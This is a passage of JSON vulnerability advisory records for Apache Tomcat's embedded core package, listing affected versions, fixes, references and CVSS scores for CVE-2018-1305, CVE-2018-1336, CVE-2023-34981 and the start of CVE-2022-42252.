9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0M1" }, { "fixed": "9.0.5" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.28" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.85" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.84", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1305" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2349801827f09fb6582a8afdeca704294106ad9a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2aac69f694d42d9219eb27018b3da0ae1bdd73ab" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/3e54b2a6314eda11617ff7a7b899c251e222b1a1" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4d637bc3986e5d09b9363e2144b8ba74fa6eac3a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c63b96d72cd39287e17b2ba698f4eee0ba508073" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/de6b4fd58b64828f374503b9ec76a12017b92895" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00004.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00044.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180706-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030042/http://www.securityfocus.com/bid/103144" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516094320/http://www.securitytracker.com/id/1040428" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1320" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d3354bb0a4eda4acc0a66f3eb24a213fdb75d12c7d16060b23e65781%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d3354bb0a4eda4acc0a66f3eb24a213fdb75d12c7d16060b23e65781@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:44:18Z", "nvd_published_at": "2018-02-23T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m59c-jpc8-m2x4", "published": "2018-10-17T16:32:18Z", "modified": "2024-03-12T05:33:41.550174Z", "aliases": [ "CVE-2018-1336" ], "summary": "In Apache Tomcat there is an improper handing of overflow in the UTF-8 decoder ", "details": "An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M9" }, { "fixed": "9.0.8" } ] } ], "versions": [ "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.31" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0RC1" }, { "fixed": "8.0.51" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.28" }, { "fixed": "7.0.87" } ] } ], "versions": [ "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1336" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/9e9b7fe1b5732277a26e437f1d32155de6208ef2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e00812b94e5830b2be3de04f4ae4ade38a700074" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/92cd494555598e99dd691712e8ee426a2f9c2e93" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/156d76a6afeef440d14044a560d6ad1d029361c4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K73008537?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K73008537?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3723-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20190703075545/http://www.securitytracker.com/id/1041375" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102810/http://www.securityfocus.com/bid/104898" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHEA-2018:2188" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHEA-2018:2189" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2700" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2701" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2740" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2741" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2742" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2921" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2930" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2945" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:3768" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722090435.GA60759%40minotaur.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:44:57Z", "nvd_published_at": "2018-08-02T14:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mppv-79ch-vw6q", "published": "2023-06-21T12:30:19Z", "modified": "2024-04-24T19:44:03Z", "aliases": [ "BIT-tomcat-2023-34981", "CVE-2023-34981" ], "summary": "Apache Tomcat vulnerable to information leak", "details": "A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS message would be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M5" }, { "fixed": "11.0.0-M6" } ] } ], "versions": [ "11.0.0-M5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.8" }, { "fixed": "10.1.9" } ] } ], "versions": [ "10.1.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.74" }, { "fixed": "9.0.75" } ] } ], "versions": [ "9.0.74" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.88" }, { "fixed": "8.5.89" } ] } ], "versions": [ "8.5.88" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34981" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2214c8030522aa9b2a367dfa5d9acff1a03666ae" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2f0ca2378415f4cf0748f4bc8fa955f41f803fa5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/739c7381aed22b7636351caf885ddc519ab6b442" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f0742f47b98aca943097f7f88e0d1163f57527e3" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=66512" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=66591" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j1ksjh9m9gx1q60rtk1sbzmxhvj5h5qz" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230714-0003" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2023-06-21T22:06:39Z", "nvd_published_at": "2023-06-21T11:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p22x-g9px-3945", "published": "2022-11-01T12:00:30Z", "modified": "2024-04-23T20:46:15.447071Z", "aliases": [ "BIT-tomcat-2022-42252", "CVE-2022-42252" ], "summary": "Apache Tomcat may reject request containing invalid Content-Length header", "details": "If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 